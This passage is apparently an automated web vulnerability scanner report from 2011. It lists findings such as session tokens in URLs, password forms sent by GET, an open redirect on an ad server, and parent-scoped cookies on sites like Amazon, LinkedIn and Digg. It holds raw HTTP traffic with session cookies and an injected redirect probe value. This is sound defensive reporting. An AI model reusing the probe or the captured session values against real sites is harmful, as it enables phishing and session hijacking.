<nobr><a rel="nofollow" class="reportingButton" href="http://www.amazon.com/gp/voting/cast/Reviews/2115/R1NVLCMGE9MX84/Inappropriate/1/ref=cm_cr_dpvoteyn?ie=UTF8&token=392DD158623052E0E67C15226C2C75E6AB368622&target=aHR0cDovL3d3dy5hbWF6b24uY29tL2dwL3Byb2R1Y3QvQjAwMk9HNVFVQy94MjIvcmVmPWNtX2NyX2Rwdm90ZXJkcj9pZT1VVEY4JmlzU1JBZG1pbj0&voteAnchorName=R1NVLCMGE9MX84.2115.Inappropriate.Reviews&voteSessionID=176-9787580-1042565"
>
Report abuse</a>
...[SNIP]...
<li><a href="/gp/redirect.html/ref=gw_m_b_ir/176-9787580-1042565?ie=UTF8&location=http%3A%2F%2Fphx.corporate-ir.net%2Fphoenix.zhtml%3Fp%3Dirol-irhome%26c%3D97664&token=F9CAD8A11D4336B5E0B3C3B089FA066D0A467C1C&_encoding=UTF8">Investor Relations</a>
...[SNIP]...
<li><a href="/gp/redirect.html/ref=gw_m_b_pr/176-9787580-1042565?ie=UTF8&location=http%3A%2F%2Fphx.corporate-ir.net%2Fphoenix.zhtml%3Fp%3Dirol-mediaHome%26c%3D176060&token=F9CAD8A11D4336B5E0B3C3B089FA066D0A467C1C&_encoding=UTF8">Press Releases</a>
...[SNIP]...
<li><a href="/gp/redirect.html/176-9787580-1042565?ie=UTF8&location=http%3A%2F%2Fwww.amazonservices.com%2Fcontent%2Fsell-on-amazon.htm%3Fld%3DAZFSSOA&token=1E60AB4AC0ECCA00151B45353E21782E539DC601&_encoding=UTF8">Sell on Amazon</a>
...[SNIP]...
<li><a href="/gp/redirect.html/176-9787580-1042565?ie=UTF8&location=http%3A%2F%2Fwww.amazonservices.com%2Fcontent%2Fproduct-ads-on-amazon.htm%3Fld%3DAZPADSFooter&token=1E60AB4AC0ECCA00151B45353E21782E539DC601&_encoding=UTF8">Advertise Your Products</a>
...[SNIP]...

9.8. http://www.amazon.com/s/  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://www.amazon.com
Path:   /s/

Issue detail

The response contains the following links that appear to contain session tokens:

Request

GET /s/ HTTP/1.1
Host: www.amazon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 21:48:21 GMT
Server: Server
x-amz-id-1: 1B5Q0P8RKVGQFA9NY3SE
p3p: policyref="http://www.amazon.com/w3c/p3p.xml",CP="CAO DSP LAW CUR ADM IVAo IVDo CONo OTPo OUR DELi PUBi OTRi BUS PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA HEA PRE LOC GOV OTC "
x-amz-id-2: nI6zZw+w2fEj6f+WxBnPsVapnrhlNWadEc8XUA04/cH3a6X/znrumVfUTZLfgypT
Vary: Accept-Encoding,User-Agent
Content-Type: text/html; charset=ISO-8859-1
Set-cookie: session-id-time=2082787201l; path=/; domain=.amazon.com; expires=Tue Jan 01 08:00:01 2036 GMT
Set-cookie: session-id=183-0423924-6403059; path=/; domain=.amazon.com; expires=Tue Jan 01 08:00:01 2036 GMT
Content-Length: 83315


<html>
<head>


<meta http-equiv="content-type" content="tex
...[SNIP]...
<li><a href="/gp/redirect.html/ref=gw_m_b_ir/183-0423924-6403059?ie=UTF8&location=http%3A%2F%2Fphx.corporate-ir.net%2Fphoenix.zhtml%3Fp%3Dirol-irhome%26c%3D97664&token=F9CAD8A11D4336B5E0B3C3B089FA066D0A467C1C&_encoding=UTF8">Investor Relations</a>
...[SNIP]...
<li><a href="/gp/redirect.html/ref=gw_m_b_pr/183-0423924-6403059?ie=UTF8&location=http%3A%2F%2Fphx.corporate-ir.net%2Fphoenix.zhtml%3Fp%3Dirol-mediaHome%26c%3D176060&token=F9CAD8A11D4336B5E0B3C3B089FA066D0A467C1C&_encoding=UTF8">Press Releases</a>
...[SNIP]...
<li><a href="/gp/redirect.html/183-0423924-6403059?ie=UTF8&location=http%3A%2F%2Fwww.amazonservices.com%2Fcontent%2Fsell-on-amazon.htm%3Fld%3DAZFSSOA&token=1E60AB4AC0ECCA00151B45353E21782E539DC601&_encoding=UTF8">Sell on Amazon</a>
...[SNIP]...
<li><a href="/gp/redirect.html/183-0423924-6403059?ie=UTF8&location=http%3A%2F%2Fwww.amazonservices.com%2Fcontent%2Fproduct-ads-on-amazon.htm%3Fld%3DAZPADSFooter&token=1E60AB4AC0ECCA00151B45353E21782E539DC601&_encoding=UTF8">Advertise Your Products</a>
...[SNIP]...

9.9. http://www.blogger.com/comment-iframe.g  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://www.blogger.com
Path:   /comment-iframe.g

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /comment-iframe.g?blogID=722867207364741287&postID=3730301442720466539&blogspotRpcToken=6110411 HTTP/1.1
Host: www.blogger.com
Proxy-Connection: keep-alive
Referer: http://www.cloudscan.me/2011/01/abstract-white-paper-relative.html
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PREF=ID=9268244d0e3d1ace:TM=1294785636:LM=1294785636:S=mgdFOGdwXJw4zKJI; blogger_TID=216bd5db56d4b0a7

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Date: Fri, 04 Feb 2011 16:11:24 GMT
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
Set-Cookie: S=blogger=rH95d6qnP5YSnOV4s87roA; Domain=.blogger.com; Path=/; HttpOnly
Server: GSE
Content-Length: 28674

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html dir="ltr"><head><title>Blogger: Penetration Testing | Hoyt LLC - Post a Comment</title>
<link href="http
...[SNIP]...

9.10. http://www.linkedin.com/in/troyd/x22  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://www.linkedin.com
Path:   /in/troyd/x22

Issue detail

The response contains the following links that appear to contain session tokens:

Request

GET /in/troyd/x22 HTTP/1.1
Host: www.linkedin.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: bcookie="v=1&0cafcf8d-e068-4822-b520-7439b567b823"; Version=1; Domain=linkedin.com; Max-Age=2147483647; Expires=Tue, 21-Feb-2079 23:39:36 GMT; Path=/
Last-Modified: Thu, 27 Jan 2011 18:58:16 GMT
If-Modified-Since: Thu, 27 Jan 2011 18:58:16 GMT
Set-Cookie: lang="v=2&lang=en"; Version=1; Domain=linkedin.com; Path=/
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Date: Thu, 03 Feb 2011 20:25:29 GMT
X-Cache: MISS from www.linkedin.com
X-Cache-Lookup: MISS from www.linkedin.com:8080
Via: 1.0 www.linkedin.com (squid/3.0.STABLE20)
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<
...[SNIP]...
<li id="send-inmail">
<a href="http://www.linkedin.com/ppl/webprofile?action=ctu&amp;id=5852264&amp;pvs=pp&amp;authToken=slSs&amp;authType=name&amp;trk=ppro_cntdir&amp;lnk=cnt_dir" rel="nofollow">Contact Troy Dennis</a>
...[SNIP]...
<li id="add-to-network">
<a href="http://www.linkedin.com/ppl/webprofile?action=ctu&amp;id=5852264&amp;pvs=pp&amp;authToken=slSs&amp;authType=name&amp;trk=ppro_getintr&amp;lnk=cnt_dir" rel="nofollow">Add Troy Dennis to your network</a>
...[SNIP]...
<p><a href="http://www.linkedin.com/ppl/webprofile?vmi=&id=5852264&pvs=pp&authToken=slSs&authType=name&locale=en_US&trk=ppro_viewmore&lnk=vw_pprofile" class="action" rel="nofollow"><span>
...[SNIP]...
<strong>
<a href="http://www.linkedin.com/ppl/webprofile?gwp=&id=5852264&pvs=pp&authToken=slSs&authType=name&locale=en_US&trk=ppro_geturl&lnk=sign_in" rel="nofollow">Sign In</a>
...[SNIP]...
<strong>
<a href="http://www.linkedin.com/ppl/webprofile?gwp=&id=5852264&pvs=pp&authToken=slSs&authType=name&locale=en_US&trk=ppro_joinnow&lnk=join_now" rel="nofollow">Join Now</a>
...[SNIP]...
<p class="btn">
<a href="http://www.linkedin.com/ppl/webprofile?vmi=&id=5852264&pvs=pp&authToken=slSs&authType=name&locale=en_US&trk=ppro_viewmore&lnk=vw_pprofile" class="action" rel="nofollow"><span>
...[SNIP]...

9.11. https://www.supermedia.com/spportal/myaccount.do  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://www.supermedia.com
Path:   /spportal/myaccount.do

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /spportal/myaccount.do;jsessionid=CD1B75B428F192D4B130C351A3081BAE.app2-a1 HTTP/1.1
Host: www.supermedia.com
Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: trafficSource="SP198c8\"; campaign_track=BP%3AUpdate%20Your%20Profile%20Top; JSESSIONID=CD1B75B428F192D4B130C351A3081BAE.app2-a1; CstrStatus=RVU; NSC_xxx-tvqfsnfejb-dpn=ffffffff9482139c45525d5f4f58455e445a4a42378b

Response

HTTP/1.1 302 Moved Temporarily
Server: Unspecified
Date: Fri, 04 Feb 2011 01:45:19 GMT
Location: https://www.supermedia.com/spportal/login.do
Content-Length: 0
Connection: close


9.12. http://www.veoh.com/webplayed.xml  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://www.veoh.com
Path:   /webplayed.xml

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /webplayed.xml?action=PlayerLoaded&videoSequence=1&userWhoEmbedded=anonymous&playSequence=0&collectionId=&autoPlay=true&percent=&playerVersion=flash/VeohPlayer-Freewheel.7.0.0.40&player=videodetails&inVeoh=true&flashVersion=WIN%2010,1,103,20&affiliateId=&cachebuster=0.22769851004704833&apiId=0E13378F-874E-DB67-3E0B-113A55BC57F9&positionTime=0&volumeLevel=NaN&totalVideos=1&truncated=false&videoId=18978294&idSource=veoh&bufferStateEntered=0&userTime=2.565&playTime=0&bufferTime=0&stopTime=2.565&pauseTime=0&playerSessionID=e5df0bf7-4865-174d-7ab5-b481ea4a57e3&client=false HTTP/1.1
Host: www.veoh.com
Proxy-Connection: keep-alive
Referer: http://www.veoh.com/static/swf/webplayer/WebPlayer.swf?version=AFrontend.5.5.4.1038
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: veohCookie="VisitorUID=F28E893B-ED80-1EAE-894D-FC564C4FF0AB&LastUpdate=03/Feb/2011:12:31:55 -0800&first=0"; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; __utmv=; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __utmb=91933981.1.10.1296766388; vvt="1&Fri, 04 Feb 2011 20:53:09 GMT"; __qca=P0-1750536792-1296766390251; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; JSESSIONID=FA513D5C45F8F3409631CA9302C4270B

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
X-HOST: appsrv-api16.els1.veoh.com
Set-Cookie: veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; Domain=.veoh.com; Path=/
Content-Type: text/xml;charset=utf-8
Content-Language: en-US
Content-Length: 94
Date: Thu, 03 Feb 2011 20:52:32 GMT


<Response>
   <Result>0</Result>
   <ErrorText></ErrorText>
</Response>

10. Password field submitted using GET method  previous  next
There are 5 instances of this issue:

Issue background

The application uses the GET method to submit passwords, which are transmitted within the query string of the requested URL. Sensitive information within URLs may be logged in various locations, including the user's browser, the web server, and any forward or reverse proxy servers between the two endpoints. URLs may also be displayed on-screen, bookmarked or emailed around by users. They may be disclosed to third parties via the Referer header when any off-site links are followed. Placing passords into the URL increases the risk that they will be captured by an attacker.

Issue remediation

All forms submitting passwords should use the POST method. To achieve this, you should specify the method attribute of the FORM tag as method="POST". It may also be necessary to modify the corresponding server-side form handler to ensure that submitted passwords are properly retrieved from the message body, rather than the URL.


10.1. http://digg.com/submit  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://digg.com
Path:   /submit

Issue detail

The page contains a form with the following action URL, which is submitted using the GET method:The form contains the following password field:

Request

GET /submit HTTP/1.1
Host: digg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 19:35:44 GMT
Server: Apache
X-Powered-By: PHP/5.2.9-digg8
Cache-Control: no-cache,no-store,must-revalidate
Pragma: no-cache
Set-Cookie: traffic_control=1168415921484595456%3A180; expires=Fri, 04-Feb-2011 19:35:44 GMT; path=/; domain=digg.com
Set-Cookie: d=0ff09a9ff26d23c27385462bc99e308f35991a0289651f6a22602a6a428198db; expires=Wed, 03-Feb-2021 05:43:24 GMT; path=/; domain=.digg.com
X-Digg-Time: D=21532 10.2.129.225
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 7633

<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<title>Digg
- Submit a link
</title>

<meta name="keywords" content="Digg, pictures, breaking news, entertainment, politics
...[SNIP]...
</script><form class="hidden">
<input type="text" name="ident" value="" id="ident-saved">
<input type="password" name="password" value="" id="password-saved">
</form>
...[SNIP]...

10.2. http://www.butterscotch.com/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.butterscotch.com
Path:   /

Issue detail

The page contains a form with the following action URL, which is submitted using the GET method:The form contains the following password field:

Request

GET /?src=tcv3video HTTP/1.1
Host: www.butterscotch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 21:48:31 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Set-Cookie: PHPSESSID=9cd00a7bedd9d1a8c93d852d79adbcb6; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 9cd00a7bedd9d1a8c93d852d79adbcb6=K00OTdKXB13YSKizkxmBPX%2FjcO3OTZnDILYwPlANhPW%2F57zhUMCXC5uDVX541cs%2B5LF76WvadMIAdqWyz6%2BJp8rhQGOGHhIe%2BiYSOqbuPtOoDEqSYYyovcVfqJx1yFza1%2BwJqg08p1HufvW8uO2eTPlkLTo72thgXWXY3eQGU0AHw8Zx4mVxTPlkLTo72thg9D23B%2BPQe%2B8YvVHbkfCPUODbi%2FURJS2QiFUamnt1siD7RLYJm73OfIn%2FcVvtvFn13c4MLsvit2LH6z0SThmcTQ%3D%3D; path=/
Connection: close
Content-Type: text/html
Content-Length: 63409

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script type="text/javascript">var _sf_startpt=(new Date()).getTime()</script>
...[SNIP]...
<div class="signuppanel" id="signuppanel_login">
<form id="login" name="login" class="rwoform01" >
<div>
...[SNIP]...
</label>
<input class="field" type="password" name="password" value="" style="width: 270px;" />
</div>
...[SNIP]...

10.3. http://www.butterscotch.com/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.butterscotch.com
Path:   /

Issue detail

The page contains a form with the following action URL, which is submitted using the GET method:The form contains the following password fields:

Request

GET /?src=tcv3video HTTP/1.1
Host: www.butterscotch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 21:48:31 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Set-Cookie: PHPSESSID=9cd00a7bedd9d1a8c93d852d79adbcb6; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 9cd00a7bedd9d1a8c93d852d79adbcb6=K00OTdKXB13YSKizkxmBPX%2FjcO3OTZnDILYwPlANhPW%2F57zhUMCXC5uDVX541cs%2B5LF76WvadMIAdqWyz6%2BJp8rhQGOGHhIe%2BiYSOqbuPtOoDEqSYYyovcVfqJx1yFza1%2BwJqg08p1HufvW8uO2eTPlkLTo72thgXWXY3eQGU0AHw8Zx4mVxTPlkLTo72thg9D23B%2BPQe%2B8YvVHbkfCPUODbi%2FURJS2QiFUamnt1siD7RLYJm73OfIn%2FcVvtvFn13c4MLsvit2LH6z0SThmcTQ%3D%3D; path=/
Connection: close
Content-Type: text/html
Content-Length: 63409

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script type="text/javascript">var _sf_startpt=(new Date()).getTime()</script>
...[SNIP]...
</script>
<form id="signup" name="signup" action="/signup.html" class="rwoform01" >
<input type=hidden name=ref value="http://www.butterscotch.com/" />
...[SNIP]...
</label>
<input class="field" type="password" name="password" value="" style="width: 270px;" />
</div>
...[SNIP]...
</label>
<input class="field" type="password" name="password2" value="" style="width: 270px;" />
</div>
...[SNIP]...

10.4. http://www.butterscotch.com/tutorials.html  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.butterscotch.com
Path:   /tutorials.html

Issue detail

The page contains a form with the following action URL, which is submitted using the GET method:The form contains the following password fields:

Request

GET /tutorials.html HTTP/1.1
Host: www.butterscotch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 21:48:32 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Set-Cookie: PHPSESSID=4f3e97b05b6880b7e05533d94dab21a4; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 4f3e97b05b6880b7e05533d94dab21a4=K00OTdKXB13YSKizkxmBPX%2FjcO3OTZnDILYwPlANhPW%2F57zhUMCXC5uDVX541cs%2B5LF76WvadMIAdqWyz6%2BJp8rhQGOGHhIe%2BiYSOqbuPtOoDEqSYYyovcVfqJx1yFza1%2BwJqg08p1HufvW8uO2eTPlkLTo72thgXWXY3eQGU0AHw8Zx4mVxTPlkLTo72thg9D23B%2BPQe%2B8YvVHbkfCPUODbi%2FURJS2QiFUamnt1siAQsiftGd%2BatIn%2FcVvtvFn13c4MLsvit2LH6z0SThmcTQ%3D%3D; path=/
Connection: close
Content-Type: text/html
Content-Length: 56018

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script type="text/javascript">var _sf_startpt=(new Date()).getTime()</script>
...[SNIP]...
</script>
<form id="signup" name="signup" action="/signup.html" class="rwoform01" >
<input type=hidden name=ref value="http://www.butterscotch.com/tutorials.html" />
...[SNIP]...
</label>
<input class="field" type="password" name="password" value="" style="width: 270px;" />
</div>
...[SNIP]...
</label>
<input class="field" type="password" name="password2" value="" style="width: 270px;" />
</div>
...[SNIP]...

10.5. http://www.butterscotch.com/tutorials.html  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.butterscotch.com
Path:   /tutorials.html

Issue detail

The page contains a form with the following action URL, which is submitted using the GET method:The form contains the following password field:

Request

GET /tutorials.html HTTP/1.1
Host: www.butterscotch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 21:48:32 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Set-Cookie: PHPSESSID=4f3e97b05b6880b7e05533d94dab21a4; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 4f3e97b05b6880b7e05533d94dab21a4=K00OTdKXB13YSKizkxmBPX%2FjcO3OTZnDILYwPlANhPW%2F57zhUMCXC5uDVX541cs%2B5LF76WvadMIAdqWyz6%2BJp8rhQGOGHhIe%2BiYSOqbuPtOoDEqSYYyovcVfqJx1yFza1%2BwJqg08p1HufvW8uO2eTPlkLTo72thgXWXY3eQGU0AHw8Zx4mVxTPlkLTo72thg9D23B%2BPQe%2B8YvVHbkfCPUODbi%2FURJS2QiFUamnt1siAQsiftGd%2BatIn%2FcVvtvFn13c4MLsvit2LH6z0SThmcTQ%3D%3D; path=/
Connection: close
Content-Type: text/html
Content-Length: 56018

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script type="text/javascript">var _sf_startpt=(new Date()).getTime()</script>
...[SNIP]...
<div class="signuppanel" id="signuppanel_login">
<form id="login" name="login" class="rwoform01" >
<div>
...[SNIP]...
</label>
<input class="field" type="password" name="password" value="" style="width: 270px;" />
</div>
...[SNIP]...

11. Open redirection  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://ad.trafficmp.com
Path:   /a/bpix

Issue detail

The value of the r request parameter is used to perform an HTTP redirect. The payload http%3a//afad3d0d022d23a44/a%3f was submitted in the r parameter. This caused a redirection to the following URL:

Issue background

Open redirection vulnerabilities arise when an application incorporates user-controllable data into the target of a redirection in an unsafe way. An attacker can construct a URL within the application which causes a redirection to an arbitrary external domain. This behaviour can be leveraged to facilitate phishing attacks against users of the application. The ability to use an authentic application URL, targetting the correct domain with a valid SSL certificate (if SSL is used) lends credibility to the phishing attack because many users, even if they verify these features, will not notice the subsequent redirection to a different domain.

Issue remediation

If possible, applications should avoid incorporating user-controllable data into redirection targets. In many cases, this behaviour can be avoided in two ways:If it is considered unavoidable for the redirection function to receive user-controllable input and incorporate this into the redirection target, one of the following measures should be used to minimize the risk of redirection attacks:

Request

GET /a/bpix?adv=1050&id=5&r=http%3a//afad3d0d022d23a44/a%3f HTTP/1.1
Host: ad.trafficmp.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 302 Moved Temporarily
Server: Apache-Coyote/1.1
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Date: Thu, 03 Feb 2011 19:13:14 GMT
Location: http://afad3d0d022d23a44/a?
Connection: close
Set-Cookie: T_kgny=9tc%3A0%3A1; Domain=trafficmp.com; Expires=Fri, 03-Feb-2012 19:13:14 GMT; Path=/
Set-Cookie: rth=2-lg22q2-9tc~0~1~1-; Domain=trafficmp.com; Expires=Fri, 03-Feb-2012 19:13:14 GMT; Path=/
Set-Cookie: uid2=473a01a9a-7bf4-4fb7-bfe3-eb7ac30eac3c-gjq1no5t; Domain=trafficmp.com; Expires=Fri, 03-Feb-2012 19:13:14 GMT; Path=/
Content-Length: 0


12. Cookie scoped to parent domain  previous  next
There are 119 instances of this issue:

Issue background

A cookie's domain attribute determines which domains can access the cookie. Browsers will automatically submit the cookie in requests to in-scope domains, and those domains will also be able to access the cookie via JavaScript. If a cookie is scoped to a parent domain, then that cookie will be accessible by the parent domain and also by any other subdomains of the parent domain. If the cookie contains sensitive data (such as a session token) then this data may be accessible by less trusted or less secure applications residing at those domains, leading to a security compromise.

Issue remediation

By default, cookies are scoped to the issuing domain and all subdomains. If you remove the explicit domain attribute from your Set-cookie directive, then the cookie will have this default scope, which is safe and appropriate in most situations. If you particularly need a cookie to be accessible by a parent domain, then you should thoroughly review the security of the applications residing on that domain and its subdomains, and confirm that you are willing to trust the people and systems which support those applications.


12.1. http://www.amazon.com/SmartDraw-com-SDS11-SmartDraw-2010/dp/B002OG5QUC/x22  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.amazon.com
Path:   /SmartDraw-com-SDS11-SmartDraw-2010/dp/B002OG5QUC/x22

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /SmartDraw-com-SDS11-SmartDraw-2010/dp/B002OG5QUC/x22 HTTP/1.1
Host: www.amazon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 21:48:21 GMT
Server: Server
x-amz-id-1: 1KMV2BXDN94S7KQ0JZ7S
p3p: policyref="http://www.amazon.com/w3c/p3p.xml",CP="CAO DSP LAW CUR ADM IVAo IVDo CONo OTPo OUR DELi PUBi OTRi BUS PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA HEA PRE LOC GOV OTC "
x-amz-id-2: q5mVjA3yFvZi2IuxLAukAm69vnbnuFICbsgIGuLZMtThRGfrgK3+KrMswERBq2Ak
Vary: Accept-Encoding,User-Agent
Content-Type: text/html; charset=ISO-8859-1
Set-cookie: session-id-time=2082787201l; path=/; domain=.amazon.com; expires=Tue Jan 01 08:00:01 2036 GMT
Set-cookie: session-id=176-9787580-1042565; path=/; domain=.amazon.com; expires=Tue Jan 01 08:00:01 2036 GMT
Content-Length: 350615


<html>
<head>


<style type="text/css"><!--


BODY { font
...[SNIP]...

12.2. http://www.amazon.com/s/  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.amazon.com
Path:   /s/

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /s/ HTTP/1.1
Host: www.amazon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 21:48:21 GMT
Server: Server
x-amz-id-1: 1B5Q0P8RKVGQFA9NY3SE
p3p: policyref="http://www.amazon.com/w3c/p3p.xml",CP="CAO DSP LAW CUR ADM IVAo IVDo CONo OTPo OUR DELi PUBi OTRi BUS PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA HEA PRE LOC GOV OTC "
x-amz-id-2: nI6zZw+w2fEj6f+WxBnPsVapnrhlNWadEc8XUA04/cH3a6X/znrumVfUTZLfgypT
Vary: Accept-Encoding,User-Agent
Content-Type: text/html; charset=ISO-8859-1
Set-cookie: session-id-time=2082787201l; path=/; domain=.amazon.com; expires=Tue Jan 01 08:00:01 2036 GMT
Set-cookie: session-id=183-0423924-6403059; path=/; domain=.amazon.com; expires=Tue Jan 01 08:00:01 2036 GMT
Content-Length: 83315


<html>
<head>


<meta http-equiv="content-type" content="tex
...[SNIP]...

12.3. http://www.manta.com/c/mm49ryk/a-b-c-development-company-inc/x22  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.manta.com
Path:   /c/mm49ryk/a-b-c-development-company-inc/x22

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /c/mm49ryk/a-b-c-development-company-inc/x22 HTTP/1.1
Host: www.manta.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
